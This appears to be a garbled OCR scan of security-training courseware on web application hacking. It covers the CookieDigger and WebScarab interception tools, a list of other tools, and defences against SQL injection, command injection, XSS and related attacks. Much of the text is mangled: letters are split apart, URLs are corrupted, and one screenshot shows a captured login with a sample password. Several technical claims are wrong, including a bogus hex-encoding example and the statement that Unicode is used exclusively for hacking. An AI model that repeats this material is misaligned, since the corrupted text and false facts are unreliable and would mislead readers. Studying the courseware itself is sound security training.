189 * Ethical Hacking and C ounterm easures Web Application Hacking Tool: CookieDigger CEH j J J CookieDigger helps id e n tify weak cookie genera tio n and insecure im p le m e n ta tio n s o f session m anagem ent by web applications It works by collecting and analyzing cookies issued by a web application for m ultiple users The to o l reports on th e p re d icta b ility and e n tro p y o f th e cookie and w h e th er critical in fo rm a tio n, such as user nam e and password, are included in th e cookie values Foundstone Cookie Digger F o u n d s to n e C oo kied igg er '/*tea URLs com /ווק.* i/vimן 31 accounts gootfe coro/seracelogn Aih ', m»l.google.conz_,'na»-1t*1c/_/)s./>mr.lrj11f1*ai1er»x04lwi$a»st.«n /rv'*1/ https y/tnal.google oorvmalavo.ai 28v1ew*«ptver^hrt4nw»*r4 https :/msi google cwn/vnahi/uaj «2hin»^aplw nchm > 6 t14 https cttiu / / M 1 4 https y/w»l.google corvm»l'u/q/'vw 1 https.avnsi google axn/_/'1nad *tat1c/_/i«/^mn/»1jt«4v vaf»x0wke»e4c an https //hi! gosgl u/o.'^j»יז*/ con 2>v»w<)«p',1 https y/w»l.g00gl*.c«ffv,m»l U/0.,J 24vww<«plvar*chfiHrw&-tr hflps //Vnal google co«n/n>ala^0-'>j«28vtew^>spuw <1W*rwQ*ty 4< https //h»«l google co!natwlaj/t)aj*ft1rtt1y«c fts/amk\jpdt HardAdnwvhtir /httpy/maim.oom http //WWW r convlognvtrfy y c http y/m*l r.o0ffvr*wm»(atand«tphp>»^d*u^ about War* http //hotmatl/ http y/ww*.f>otm»l com/ et f_soace «tnp v.3a"2. F 2 ffrai.. ' j d f n (jw d»* ** p»e tn! gt>3gl» com/tnsl'u/oaj «Back Mod > http :// cafee.com C o p y r ig h t b y EC-Cauactl. A ll R ig h ts R e s e rv e d. R e p r o d u c tio n is S t r ic t ly P r o h ib ite d. W e b A p p l i c a t i o n H a c k i n g T o o l : C o o k i e D i g g e r S ource: h ttp ://w w w.m c a fe e.c o m C o o kie D ig g e r is a to o l th a t d e te c ts v u ln e ra b le co o kie g e n e ra tio n and th e in se cure im p le m e n ta tio n o f session m a n a g e m e n t by w e b a p p lic a tio n s. This to o l is based on th e c o lle c tio n and e v a lu a tio n o f co o kie s by a w e b a p p lic a tio n used by m a n y users. C e rta in ty and e n tro p y o f th e c o o k ie a re fa c to rs on w h ic h th e to o l relies. The co o kie va lu e s c o n ta in v a lu a b le in fo rm a tio n such as th e lo g in d e ta ils o f th e user (u se r n a m e and p a ssw o rd ). M odule 13 Page 1911

190 F o u n d s t o n e C o o k i e D i g g e r File Help Foundstone CookieDigger Visted URLs /http//www gmad com https ://accounts google.com/serviceloginauh https J/mei google com/_/m«l-stabc/_/js/man/m_11/rt41/ver*x061wk se4k en /*v*1/am«f https J/mM google 24vtew»bsp4ver*ohN4rw8mbn4 com/mai/u/oaj https J/mai google com/mail/u/oaji -2&v1ew bsp 0W4fw 4ver 8mbn4 https J/mai google com/mad/u/oaji=24vtew bsp4ver«ohh4rw&nbo4 1 https//maj googlecom/ma1l/u/q/'>shva https ://maj google com/_/mad stafcc/_/j3/man/m_i Jt/rt4\/ver»X06lWKEse4k en7$v»1/a<n»f httpsv/mai google com/mail/u/0aj1*24v1ew«bsp4ver»ohn4rw&t1bn4 google bsp4ver*ohh4rw&t1bn4 24v1ew com/ma!l/u/0ajt google com/marf/u/0/'>u1-24v>ew-6sp4ver-ohh4rw&nbr14 c https//ma< google com/mad/u/0aj!4tml4zy res //!esetup db/hardmmmkm http //www mcom/login venfy php ;POST Data f_sourcereṭ rttp %3A%2F%2fmai n.com 2Fnewm«l / %2Frt>oxphpJJgfrm*<nai!f jd* matthews4 f _pwd*sweetp!e User ID jg http //mail jn com/newmad/ftemdex php,msgd *4type about blank Password I* http //hotmaj/ http //Www hotmad com/ «Back Nod» F I G U R E : C o o k i e D i g g e r T o o l S c r e e n s h o t M odule 13 Page 1912

191 Web Application Hacking Tool: WebScarab CEH W e b S c a r a b is a f r a m e w o r k f o r a n a l y z i n g a p p l i c a t i o n s t h a t c o m m u n i c a t e u s i n g t h e H T T P a n d H T T P S p r o t o c o l s I t a l l o w s t h e a t t a c k e r t o r e v i e w a n d m o d i f y r e q u e s t s c r e a t e d b y t h e b r o w s e r b e f o r e t h e y a r e s e n t t o t h e s e r v e r, a n d t o r e v i e w a n d m o d i f y r e s p o n s e s r e t u r n e d f r o m t h e s e r v e r b e f o r e t h e y a r e r e c e i v e d b y t h e b r o w s e r F ile V ie w I o o l s H e lp S u m m a r y M e s s a g e lo g P r o x y M a n u a l R e q u e s t W e b S e r v ic e s S p id e r E x te n s io n s S e s s io n ID A n a ly s is S c r ip te d F ra g m e n ts C o m p a re 2 S u m m a ry T re e S e le c tio n n ite r s c o n v e r s a tio n lis t U rl M e th o d s S ta tu s S e t-c o o k ie C o m m e n ts S c n p ts? (15 h ttp ://w w w.o w a sp.o ra :8 0 / G E T 301 M o v e d.. / s n b a n n e r o - n im a a e s / 9 (1 3 in d e x p h p / O M a ln _ P a g e G E T O K E o- s k in s / U U b/u bo T U t I ' H o s t P a th / ' http /M vw w o w a s p org BU /s k in s /m o n o b o o k /m a in S ta tu s 2 D U O K O rig in w w.o w a s p.o rg 80 /s k in s /c o m m o n /IE F ix e s P roxy h ttp ://w w w.o w a s p.o rg.8 0 /s k in s /c o m m o n /c o m m o P roxy /0 6 /2 3 G E T h ttp ://w w w.o w a s p o rg 80 /in d e x p h p /M a m _ P a g e P roxy /0 6 / G E T h ttp ://w w w.o w a s p.o rg.8 0 l/ P roxy h ttp ://w w w.o w a s p.o rg C o p y r ig h t b y E C -G a u a c tl. A ll R ig h ts R e s e rv e d. R e p r o d u c tio n is S t r ic t ly P r o h ib ite d. W e b A p p l i c a t i o n H a c k i n g T o o l : W e b S c a r a b S ource: h ttp ://w w w.o w a s p.o r g W e b S cara b is a fra m e w o rk fo r a n a lyzin g a p p lic a tio n s th a t c o m m u n ic a te using th e HTTP and HTTPS p ro to c o ls. It is w r itte n in Java, and is th u s p o rta b le to m a n y p la tfo rm s. W e b S cara b has se veral m o d e s o f o p e ra tio n, im p le m e n te d by a n u m b e r o f p lu g in s. It o p e ra te s as an in te rc e p tin g p ro xy, a llo w in g th e a tta c k e r to re v ie w and m o d ify re q u e sts c re a te d by th e b ro w s e r b e fo re th e y a re s e n t to th e se rve r, and to re v ie w and m o d ify resp onses re tu rn e d fro m th e s e rve r b e fo re th e y a re re ce ive d by th e b ro w s e r. It is e ven a ble to in te rc e p t b o th HTTP and HTTPS c o m m u n ic a tio n. The o p e ra to r can also re v ie w th e c o n v e rs a tio n s (re q u e s ts and resp onses) th a t have passed th ro u g h W e b S cara b. M odule 13 Page 1913

192 i W e b S c a r a b X F ile V ie w I o o l s H e lp S u m m a r y M e s s a g e lo g P r o x y M a n u a l R e q u e s t W e b S e r v ic e s S p id e r E x t e n s io n s S e s s io n ID A n a ly s is S c r ip te d F r a g m e n ts F u z z e r C o m p a r e 1 1 E l S u m m a r y a 1 * T r e e S e le c tio n f i l t e r s c o n v e r s a t io n lis t U rl M e th o d s S ta tu s S e t- C o o k le C o m m e n ts S c rip ts J E T M o v e? h ttp ://w w w.o w a s p.o rg :8 0 / G 301 d... 3 ] b a n n e r s / o - C 3 im a g e s /? In d e x p h p / Q M a in _ P a g e s k in s / G E T O K 0 o M ID - : ate ethod H ost Path P aram eters Status O rigin I ד 2 U 0 B Z D E /2 X T Ufc 1 http ://w w w. o w a s p. 0 rg : 8 U /S K in s /m o n o D O O K fm a in 'N 2UU U K P roxy A /0 6 / G E T http ://W w w.o w a s p. 0 r g : 80 /s k in s /c o m m o n /IE F tt e s O K P ro x y /06/23. GET http ://www. ow a s p. 0 rg : 80 /skins/com m o n /com m o 200 OK Proxy /0 6 /2 3 G E T h ttp ://W w w.o w a s p.o rg 80 /in d e x p h p /M a in _ P a g e O K P roxy /06/23... GET http ://W ww.owasp.org :80 / 301 M ove d... Proxy - י III 1 i. 2 7 / F I G U R E : W e b S c a r a b T o o l S c r e e n s h o t M odule 13 Page 1914

193 Web A pplication H acking Tools I CEH M a s I n s t a n t S o u r c e h ttp : / / w w w. b la z in g to o ls.c o m H t t p B e e h t t p : / / w w w. oo o. n u w 3 a f h t t p : / / w 3 a f. s o u r c e fo r g e, n e t T e l e p o r t P r o ^ ^ 4 ) h t t p : / / w w w. te n m a x. c o m G N U W g e t W e b C o p i e r h tt p : / / g n u w in 3 2. s o u r c e fo r g e, n e t י h t t p : / / w w w. m a x im u m s o ft.c o m f 3 h B l a c k W i d o w h t t p : / / s o ft b y t e la b s. c o m c U R L t t p : / /c u r I. h axx. s e & H T T T R A C K h t t p : / / w w w. h tt r a c k. c o m M i l e S C A N P a r o s P r o h t t p : / / w w w. m ile s c a n. c o m C o p y r ig h t b y E C -G a u a c tl. A ll R ig h ts R e s e rv e d. R e p r o d u c tio n is S t r ic t ly P r o h ib ite d. / \ W e b A p p l i c a t i o n H a c k i n g T o o l s A fe w m o re to o ls th a t can be used fo r h a ckin g w e b a p p lic a tio n s are liste d as fo llo w s : In s ta n t Source a v a ila b le a t h ttp ://w w w.b la z in g to o ls.c o m w 3 a f a v a ila b le a t h ttp ://w 3 a f.s o u rc e fo rg e.n e t GNU W g e t a v a ila b le a t h ttp ://g n u w in 3 2.s o u rc e fo rg e.n e t B la c k W id o w a v a ila b le a t h ttp ://s o ftb y te la b s.c o m curl a v a ila b le a t h ttp ://c u rl.h a x x.s e H ttp B e e a v a ila b le a t h ttp : / / w w w.0q0.nu T e le p o rt Pro a v a ila b le a t h ttp ://w w w.te n m a x.c o m W e b C o p ie r a v a ila b le a t h ttp ://w w w.m a x im u m s o ft.c o m Hill RACK a v a ila b le a t h ttp ://w w w.h ttra c k.c o m M ilesc AN ParosP ro a v a ila b le a t h ttp ://w w w.m ile s c a n.c o m M odule 13 Page 1915

194 Module Flow W e b A p p Pen T estin g,i י 0 W e b A p p C oncepts S e c u rity Tools q y & W e b A p p T h re a ts C o u n te rm e a s u re s W e b A p p lic a tio n H ackin g Tools C o p y r ig h t by EC-Cauactl. A ll R ig h ts R e s e rv e d. R e p r o d u c tio n is S t r ic t ly P r o h ib ite d. ^ M o d u l e F l o w So fa r, w e have discussed v a rio u s c o n c e p ts such as th re a ts a ssociated w ith w e b a p p lic a tio n s, h a ckin g m e th o d o lo g y, and h acking to o ls. A ll th e s e to p ic s ta lk a b o u t h o w th e a tta c k e r b reaks in to a w e b a p p lic a tio n o r a w e b s ite. N o w w e w ill discuss w e b a p p lic a tio n c o u n te rm e a s u re s. C o u n te rm e a s u re s a re th e p ra c tic e o f usin g m u ltip le s e c u rity syste m s o r te c h n o lo g ie s to p re v e n t in tru s io n s. These are th e key c o m p o n e n ts fo r p ro te c tin g and s a fe g u a rd in g th e w e b a p p lic a tio n a g a in st w e b a p p lic a tio n a tta cks. V W e b A p p Pen T e s tin g /jj&mk W e b A p p C o n cepts ^ S e c u rity T o o ls.r" W e b A p p T h re a ts m C o u n te rm e a s u re s = e5 י ' (j H a ckin g M e th o d o lo g y vf 1 W e b A p p lic a tio n H a ckin g T o o ls M odule 13 Page 1916

195 This s e c tio n h ig h lig h ts v a rio u s w a ys in w h ic h you can d e fe n d a g a in st w e b a p p lic a tio n a tta c k s such as SQL in je c tio n a tta cks, c o m m a n d in je c tio n a tta cks, XSS a tta cks, etc. M odule 13 Page 1917

196 Encoding Schemes CEH W e b a p p l i c a t i o n s e m p l o y d i f f e r e n t e n c o d i n g s c h e m e s f o r t h e i r d a t a t o safely handle unusual characters and binary data i n t h e w a y y o u i n t e n d URL e n c o d in g is th e process o f c o n v e rtin g URL in to v a lid ASCII fo rm a t so t h a t d a ta can be s a fe ly tra n s p o rte d o v e r HTTP URL e n c o d in g repla ces u n u s u a l ASCII c h a ra cte rs w ith "% " fo llo w e d b y th e c h a ra c te r's t w o - d ig it ASCII c o d e expressed in hexadecim al such as: d ט % 3 a % 0 a N e w lin e «%20 s p a c e A n HTM L e n c o d in g s chem e is used to re p re s e n t u n u s u a l c h a ra c te rs so t h a t th e y can be sa fe ly c o m b in e d w ith in an H TM L d o c u m e n t It d e fin e s se vera l H T M L e n titie s to re p re s e n t p a rtic u la rly usual characters such as: C o p y r ig h t b y EC-Cauactl. A ll R ig h ts R e s e rv e d. R e p r o d u c tio n is S t r ic t ly P r o h ib ite d. E n c o d i n g S c h e m e s HTTP p ro to c o l and th e H TM L language are th e tw o m a jo r c o m p o n e n ts o f w e b a p p lic a tio n s. B o th th e se c o m p o n e n ts are te x t based. W e b a p p lic a tio n s e m p lo y e n c o d in g sch em es to e n su re b o th th e se c o m p o n e n t h a n d le u n u sual c h a ra c te rs and b in a ry d a ta s a fe ly. The e n c o d in g sch em es in c lu d e : m U R L E n c o d i n g URLs are p e rm itte d to c o n ta in o n ly th e p rin ta b le ch a ra c te rs o f ASCCI code w ith in th e range 0 x x 7 e in clu sive. S everal c h a ra c te rs w ith in th is range have special m e a n in g w h e n th e y are m e n tio n e d in th e URL sch em e o r HTTP p ro to c o l. H ence, such c h a ra c te rs are re s tric te d. URL e n c o d in g is th e process o f c o n v e rtin g URLS in to v a lid ASCII fo rm a t so th a t d a ta can be sa fe ly tra n s p o rte d o v e r HTTP. URL e n c o d in g re p la ce s u n u sual ASCII c h a ra c te rs w ith "% " fo llo w e d by th e c h a ra c te r's tw o -d ig it ASCII code expresse d in h e x a d e c im a l such as: Q %3d Q %0a New l i n e 9 %20 sp a ce M odule 13 Page 1918

197 > H T M L E n c o d i n g *** The H TM L e n c o d in g sch em e is used to re p re s e n t u n u sual c h a ra c te rs so th a t th e y can be sa fe ly e n te re d w ith in an H TM L d o c u m e n t as p a rt o f its c o n te n t. The s tru c tu re o f th e d o c u m e n t is d e fin e d by v a rio u s ch a ra c te rs. If you w a n t to use th e sam e c h a ra c te rs as p a rt o f th e d o c u m e n t's c o n te n t, you m ay fa ce p ro b le m. This p ro b le m can be o v e rc o m e by using H TM L e n c o d in g. It d e fin e s several H T M L e n titie s to re p re s e n t p a rtic u la rly usual c h a ra c te rs such as: Q & a m p ; & e & it; < e & g t; > M odule 13 Page 1919

198 E n c o d in g S c h e m e s (C o n t1(!) Base64 Encoding Hex Encoding CEH Base64 encoding schem e represents any binary data using only p rin ta b le ASCII characters HTML enco ding schem e uses hex value o f e very character to repre se n t a collectio n o f characters fo r tra n s m ittin g binary data tt Example: H ello A125C458D8 Jason 123B684AD9 Copyright by EC-Cauactl. All Rights Reserved. Reproduction is S trictly Prohibited. E n c o d i n g S c h e m e s ( C o n t d ) Unicode Encoding Unicode is a character encoding standard that is designed to support all of the writing systems used in the world. Unicode is exclusively used to hack web applications. Unicode encoding helps attackers to bypass the filters. 16-bit Unicode encoding: It replaces unusual Unicode characters with "%u" followed by the character's Unicode code point expressed in hexadecimal: % u2215 / % u00e9 Base 64 Encoding Base 64 schem es a re used to enco de b in a ry data. A Base 64 e n c o d in g schem e re p re se n ts any b in a ry d ata using o n ly p rin ta b le ASCII characters. U sually it is used fo r e n c o d in g e m a il a tta c h m e n ts fo r safe tra n s m is s io n o v e r SMTP and also used fo r encoding user credentials. Example: c a k e B a s e 6 4 E n c o d in g : Hex Encoding An HTM L e n c o d in g schem e uses hex value o f e very ch a ra c te r to re p re s e n t a c o lle c tio n o f ch a ra cte rs fo r tra n s m ittin g binary data. Exam ple: H e l l o A 1 2 5C 4 58D 8 J a s o n 123 B 6 8 4A D 9 U T F - 8 It is a variable-length encoding standard that uses each byte expressed in hexadecimal and preceded by the %prefix: %c2%a9 %«2%89%a0 TABLE : E n c o d in g S c h e m e s T a b le M odule 13 Page 1920

199 How to Defend Against SQL Injection Attacks CEH Lim it the length o f user input Use custom erro r messages M o n ito r DB tra ffic using an IDS, WAF Disable com m ands like xp_cm dshell JT 1 Isolate database server and w eb server Always use m ethod a ttrib ute set to POST Run database service account w ith m inim al rights M ove extended stored procedures to an isolated server Microsoft SQL Server Use typesafe variables or functions such as IsNumeric() to ensure typesafety V a lid a te and sanitize user in p u ts passed to th e database Use lo w privileged account fo r DB connection Copyright by EC-Cauactl. All Rights Reserved. Reproduction is S trictly Prohibited. H o w t o D e f e n d A g a i n s t S Q L I n j e c t i o n A t t a c k s To defend against SQL injection attacks, various things have to be taken care of like unchecked user-input to d ata b a se -q u e rie s should not be allowed to pass. Every user variable passed to th e d atab a se should be validated and sanitized. The given input should be checked for any expected data type. User input, which is passed to th e database, should be q u oted. e e e e e e e Limit th e length of user input Use custom error m essages M onitor DB traffic using an IDS, WAP Disable c o m m a n d s like xp_cm dshell Isolate d ata b a se server and w eb server Always use m e th o d attribute set to POST Run d ata b a se service account with minimal rights 0 M ove ex ten d e d stored procedures to an isolated server 0 Use typesafe variables or functions such as IsNumeric() to ensure typesafety Validate and sanitize user inputs passed to th e d atab a se M odule 13 Page 1921

200 Q Use low privileged account for DB connection M odule 13 Page 1922

201 - - and How to Defend Against Comm! Injection Flaws J L E Copyright by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited. 0 / H o w t o D e f e n d A g a i n s t C o m m a n d I n j e c t i o n F l a w s ' The sim plest w ay to protect against c o m m a n d injection flaws is to avoid th e m ^ w h erev er possible. S om e language specific libraries perform identical functions for m any shell c o m m a n d s and so m e system calls. T hese libraries do not contain th e operating system shell interpreter, and so ignore m axim um shell c o m m a n d problem s. For th o se calls th a t m u st still be used, such as calls to backend d atabases, o n e m ust carefully validate th e data to ensure th a t it d oes not contain malicious content. O ne can also arrange various requests in a pattern, which ensures th a t all given p a ra m e te rs are treated as data instead of potentially ex ecu tab le content. M ost system calls and th e use of stored p rocedures w ith p a ram eters th a t accept valid input strings to access a d atab a se or prepared sta te m e n ts provide significant protection, ensuring th a t th e supplied input is treated as data, which reduces, but d oes not com pletely elim inate th e risk involved in th ese external calls. O ne can always authorize th e input to ensure th e protection of th e application in question. Least privileged accounts m u st be used to access a d atab a se so th a t th e re is th e sm allest possible loophole. The o th er strong protection against c o m m a n d injection is to run w e b applications with th e privileges required to carry out their functions. Therefore, o n e should avoid running th e w eb server as a root, or accessing a d ata b a se as a DBADMIN, or else an attacker m ay be able to m isuse adm inistrative rights. The use of Java sandbox in th e J2EE en v iro n m en t stops th e execution of th e system co m m an d s. M odule 13 Page 1923

202 The use of an external c o m m a n d thoroughly checks user inform ation th a t is inserted into th e c o m m an d. C reate a m echanism for handling all possible errors, tim eouts, or blockages during th e calls. To en su re th e expected w ork is actually perform ed, check all th e output, return, and error codes from th e call. At least this allows th e user to d e term in e if som ething has gone w rong. O therw ise, an attack m ay occur and never be detected. Perform input validation Use language-specific libraries th a t avoid problem s due to shell c o m m a n d s Use a safe API th a t avoids th e use of th e interpreter entirely Use p aram eterized SQL queries Escape d an g ero u s characters Perform input and o u tp u t encoding Structure requests so th a t all supplied p a ram eters are treated as data, rather than potentially executable co n ten t Use m odular shell disassociation from kernel M odule 13 Page 1924

203 How to Defend Against XSS Attacks C E H V a lid a te a ll h e a d e rs, U se t e s tin g to o ls c o o k ie s, q u e ry s trin g s, E n code In p u t e x te n s iv e ly d u r in g th e D o n o t a lw a y s fo r m fie ld s, a n d h id d e n a n d o u t p u t a n d d e s ig n p h a s e to t r u s t w e b s ite s f ie ld s (i.e., a ll p a ra m e te rs ) f i lt e r M e ta e lim in a te s u c h XSS t h a t u se HTTPS a g a in s t a rig o ro u s c h a ra c te rs in th e h o le s in th e a p p lic a tio n w h e n it c o m e s to s p e c ific a tio n in p u t b e fo r e it g o e s in to u se XSS 1 3 x 5 _ 7 % \ / U se a w e b F ilte rin g s c r ip t o u t p u t C onvert all non - / \ y Develop som e standard or a p p lic a tio n fire w a ll can also d e fe a t XSS alphanum eric characters signing scripts w ith private t o b lo c k th e v u ln e r a b ilitie s b y to H TM L c h a ra c te r a n d p u b lic keys th a t e x e c u tio n o f p r e v e n tin g th e m fro m entitie s before displaying actually check to ascertain m a lic io u s s c r ip t b e in g t r a n s m itt e d to th e user in p u t in search th a t th e s c rip t in tro d u c e d u s e rs engines and foru m s is really authentica ted Copyright by EC-Gauactl. All Rights Reserved. Reproduction is Strictly Prohibited. H o w t o D e f e n d A g a i n s t X S S A t t a c k s The following are th e defensive techniques to p revent XSS attacks: Q Check and validate all th e form fields, hidden fields, headers, cookies, query strings, and all th e p a ram eters against a rigorous specification. Im plem ent a stringent security policy. W e b servers, application servers, and w eb application env iro n m en ts are vulnerable to cross-site scripting. It is hard to identify and rem ove XSS flaw s from w e b applications. The best w ay to find flaws is to perform a security review of th e code, and search in all th e places w h ere input from an HTTP req u est co m es as an o u tp u t through HTML. Q A variety of different HTML tags can be used to transm it a malicious JavaScript. Nessus, Nikto, and o th er tools can help to so m e extent for scanning w ebsites for th ese flaws. If vulnerability is discovered in o n e w ebsite, th e re is a high chance of it being vulnerable to o th er attacks. Filter th e script o u tp u t to d efeat XSS vulnerabilities which can prevent th e m from being tran sm itted to users. The entire code of th e w ebsite has to be review ed if it has to be p rotected against XSS attacks. The sanity of th e code should be checked by reviewing and com paring it against exact specifications. The areas should be checked as follows: th e headers, as well as M odule 13 Page 1925

204 cookies, query string form fields, and hidden fields. During th e validation process, th ere m ust be no a tte m p t to recognize th e active content, neither to rem o v e th e filter nor sanitize it. T here are m any w ays to e n co d e th e know n filters for active content. A "positive security policy" is highly re c o m m e n d e d, which specifies w h a t has to be allowed and w h a t has to be rem oved. Negative or attack signature-based policies are hard to maintain, as th ey are incom plete. 0 Input fields should be limited to a m axim um since m ost script attacks need several characters to get started. M odule 13 Page 1926

205 - How to Defend Against DoS Attack C E H Secure th e re m o te a d m in is tra tio n a n d c o n n e c tiv ity te s tin g C o n fig u re th e fire w a ll to d e n y e x te rn a l In te rn e t C o n tro l M essage P ro to c o l (ICMP ) tra ffic access P re v e n t use o f u n n ecessary fu n c tio n s such as gets, strc p y, a n d re tu rn addresse s fro m o v e rw ritte n etc. Data processed b y th e a tta c k e rs h o u ld be s to p p e d fro m being executed P revent th e sensitive in fo rm a tio n fro m o v e rw ritin g P e rfo rm th o ro u g h in p u t v a lid a tio n Copyright by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited. H o w t o D e f e n d A g a i n s t D o S A t t a c k s ל attacks: The following are th e various m easu res th a t can be ad o p te d to defend against DoS 6 Configure th e firewall to deny external In tern et Control M essag e Protocol (ICMP) traffic access. Secure th e rem o te adm inistration and connectivity testing. Prevent use of unnecessary functions such as gets, strcpy, and return add resses from being overw ritten, etc. 0 Prevent sensitive inform ation from overwriting. 0 Perform th orough input validation. Data processed by th e attacker should be sto p p ed from being executed. M odule 13 Page 1927

206 How to Defend Against Web Services Attack CEH Urt1fw4 ilhiul lutbm Configure WSDL Access C ontrol Perm issions to grant o r deny access to any ty p e o f WSDL-based SOAP messages Use docu m e n t-centric a u th e n tica tio n credentia ls that usesaml Use multiple security credentials such as X.509 Cert, SAML assertions and WS-Security Deploy w e b services-capable firew alls capable o f SOAP and ISAPI level filtering Configure firewalls/ids systems for a web services anomaly and signature detection Configure firew alls/id S systems to filte r im proper SOAP and XML syntax Im plem ent centralized in-line requests and responses schema validation Block e xte rn a l references and use pre-fetched c o n tent when de-referencing URLs M a in ta in and u p d ate a secure repository o f XML schemas Copyright by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited H o w t o D e f e n d A g a i n s t W e b S e r v i c e s A t t a c k s To defend against w eb services attacks, th e re should be a provision for multiple layers of protection th a t dynamically enforces legitimate application usage and blocks all know n attack paths with or w ithout relying on signature databases. This com bination has proven effective in blocking even unknow n attacks. Standard HTTP authentication techniques such as digest and SSL client-side certificates can be used for w eb services as well. Since m o st m odels incorporate business-to-business applications, it b eco m e s easier to restrict access to only valid users. Configure firewalls/idss for a w eb services anom aly and signature detection. Configure WSDL Access Control Perm issions to grant or deny access to any type of W SD L-based SOAP m essag es. Configure firewalls/ids system s to filter im proper SOAP and XML syntax. Use docum ent-centric authentication credentials th a t use SAML. Im plem ent centralized in-line requests and responses sch em a validation. Use multiple security credentials such as X.509 Cert, SAML assertions, and WS-Security. Block external references and use pre-fetched co n te n t w h en de-referencing URLs. Deploy w eb-services-capable firewalls capable of SOAP- and ISAPI-level filtering. M odule 13 Page 1928

207 Q M aintain and u p d ate a secure repository of XML schem as. M odule 13 Page 1929

208 - Web Application Countermeasures CEH Unvalidated Redirects ^ and Forw ards A void using redirects and forw ards e If d e s tin a tio n p a ra m e te rs ca n n o t be a void ed, ensu re th a t th e supplied valu e is v a lid, and authorized fo r the user Broken Authentication and Session M anagem ent 8 Use SSL fo r all a u th e n tic a te d parts S o f th e a p p lic a tio n Verify w hether all the users' id e n titie s and cre d e n tia ls are sto re d in a hashed form 8 N e ve r s u b m it session d a ta as p a rt o f a GET, POST Cross-Site R equest Forgery L o g o ff im m e d ia te ly a fte r using a w e b application and clear the history Do n o t a llo w y o u r b ro w s e r and w e b site s to save lo g in d e ta ils Check th e HTTP R e fe rre r h e a d e r and w h e n processing a POST, ig n o re URL param eters Insecure Cryptographic Storage C Do n o t cre a te o r use w e a k c ry p to g ra p h ic a lg o rith m s G e n e ra te e n c ry p tio n keys o fflin e and s to re th e m securely Ensure th a t e n c ry p te d data sto re d o n disk is n o t easy to d e c ry p t Copyright by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited. W e b A p p l i c a t i o n C o u n t e r m e a s u r e s The following are th e various c o u n te-m easu res th a t can be ad o p te d for w eb applications. U nvalidated R edirects and F orw ards Avoid using redirects and forw ards if destination p ara m e te rs can n o t be avoided; en su re th at th e supplied value is valid, and authorized for th e user. Cross-Site R equest Forgery Log off im m ediately after using a w eb application and clear th e history. Do not allow your brow ser and w ebsites to save login details. Check th e HTTP Referrer h e a d e r and w h e n processing a POST, ignore URL param eters. B roken A uthentication an d Session M a n a g e m e n t Use SSL for all au th en ticated parts of th e application. Verify w h e th e r all th e users' identities and credentials are stored in a hashed form. Never subm it session data as part of a GET, POST. M odule 13 Page 1930

209 Insecure C ryptographic Storage Do not create or use w eak cryptographic algorithms. G en erate encryption keys offline and store th e m securely. Ensure th at encrypted data stored on disk is not easy to decrypt. M odule 13 Page 1931

210 Web Application Counterrr16a&11res - (C o n t d): / \ y / Insufficient Transport Layer Protection S S S Non-SSL requests to web pages should be redirected to th e SSL page Set th e 'secure' flag on all sensitive cookies Configure SSL provider to support only strong algorithm s 2 Ensure th e certificate is valid, n o t expired, and m atches all dom ains used by th e site S Backend and other connections should also use SSL or other encryption technologies Directory Traversal 5 Define access rights to the protected areas of the website 6 A p ply ch e cks/hot fixes th a t prevent th e exp lo itation o f th e vuln e ra b ility such as Unicode to affect the directory traversal e Web servers should be updated w ith security patches in a tim ely manner T A V \ T A s v S S Cookie/Session Poisoning Do n o t sto re plain te xt o r weakly encrypted password in a cookie Im plem ent cookie's tim e o u t t! Cookie's auth entica tion credentials should be associated w ith an IP address S M ake logout functions available.ccipyright by EC-CounGil. All Rights ReSeiveilReproduction is Strictly Prohibited. W e b A p p l i c a t i o n C o u n t e r m e a s u r e s ( C o n t d ) applications. The following are th e various co u n te rm e a su re s th a t can be ad o p te d for w eb Insufficient T ransport Layer P rotection Non-SSL requests to w e b pages should be redirected to th e SSL page. Set th e 'secu re flag on all sensitive cookies. Configure SSL provider to su p p o rt only strong algorithms. Ensure th e certificate is valid, not expired, and m atch e s all dom ain s used by th e site. Backend and o th er connections should also use SSL or o th er encryption technologies. Directory Traversal Define access rights to th e p rotected areas of th e w ebsite. Apply checks/hot fixes th a t prevent th e exploitation of th e vulnerability such as Unicode to affect th e directory traversal. W eb servers should be u p d ated with security patches in a timely m anner. M odule 13 Page 1932

211 C ookie/session Poisoning Do not store plain text or w eakly encrypted passw ord in a cookie. Im p lem ent cookie's tim eout. Cookie's authentication credentials should be associated with an IP address. 0 M ake logout functions available. M odule 13 Page 1933

212 Web Application Countermeasures (C o n t d) C E H S ecu rity M isconfiguration File Injection A tta c k Configure all security mechanisms and turn o ff all unused services Setup roles, permissions, and accounts and disable all d efa ult accounts orchange their default passwords Scan fo r latest security vulnerabilities and apply the latest security patches Perform type, pattern, and dom ain value validation on all input data Make LDAP filte r as specific as possible Validate and restrict the a m o u n t o f data returned to the user Im plem ent tig h t access co ntro l on the data in the LDAP directory Perform dynam ic testing and source code analysis Strongly validate user input Consider im plem enting a ch roo t jail PHP: Disable allow _url_fopen and allow_url_include in php.ini PHP: Disable register_globals and use E_STRICTtofind uninitialized variables PHP: Ensure th a t all file and streams functions (stream _*) are carefully vetted Copyright by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited. W e b A p p l i c a t i o n C o u n t e r m e a s u r e s ( C o n t d ) applications. The following are th e various co u n te rm e a su re s th a t can be ad o p te d for w eb Security M isconfiguration Configure all security m echanism s and turn off all unused services. Set up roles, perm issions, and accounts and disable all default accounts or change their default passw ords. Scan for latest security vulnerabilities and apply th e latest security patches. LDAP Injection A ttacks Perform type, pattern, and dom ain value validation on all input data. M ake LDAP filters as specific as possible. Validate and restrict th e a m o u n t of data returned to th e user. Im plem ent tight access control on th e data in th e LDAP directory. Perform dynam ic testing and source code analysis. M odule 13 Page 1934

213 File Injection A ttack Strongly validate user input. Consider im plem enting a chroot jail. PHP: Disable allow _url_fopen and allow_url_include in php.ini. PHP: Disable register_globals and use E_STRICT to find uninitialized variables. PHP: Ensure th a t all file and stream s functions (stream _*) are carefully vetted. M odule 13 Page 1935 Ethical Hacking and C ounterm easures Copyright by EC-COUIICil

